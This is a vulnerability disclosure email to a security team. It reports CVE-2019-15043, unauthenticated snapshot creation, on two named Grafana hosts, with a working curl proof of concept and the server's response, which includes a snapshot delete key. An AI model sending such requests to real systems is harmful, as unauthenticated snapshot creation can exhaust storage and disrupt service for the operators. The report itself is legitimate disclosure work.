Hey Security Team,
I'm a security researcher.
I have found a critical vulnerability on one of your domains, CVE-2019-15043, which can lead to a DDoS attack and can make the system go down via the Grafana snapshot instance.
Vulnerable URLs:
https://grafana.opendev.org/api/snapshots
https://grafana.quiknode.io/api/snapshots
PoC:
# Unauthenticated POST of an empty dashboard is enough to create a snapshot
root@kali:/home/kali# curl -s -XPOST https://grafana.opendev.org/api/snapshots -H "Accept: application/json" -H "Content-Type: application/json" -d '{"dashboard": {}}' | json_pp
{
   "deleteKey" : "6mYFALwQmmpImHeKS30XtFw8ogmoHaSm",
   "deleteUrl" : "http://localhost:3000/api/snapshots-delete/6mYFALwQmmpImHeKS30XtFw8ogmoHaSm",
   "key" : "91H6lcVrwiivMuW1H2iAKcUsZwYU2xfO",
   "url" : "http://localhost:3000/dashboard/snapshot/91H6lcVrwiivMuW1H2iAKcUsZwYU2xfO"
}
For reference: https://aaron-hoffmann.com/blog/cve-2019-15043/
Fix it by updating to the latest Grafana version.
Best Regards,
Divya Singh - @Dgirlwhohacks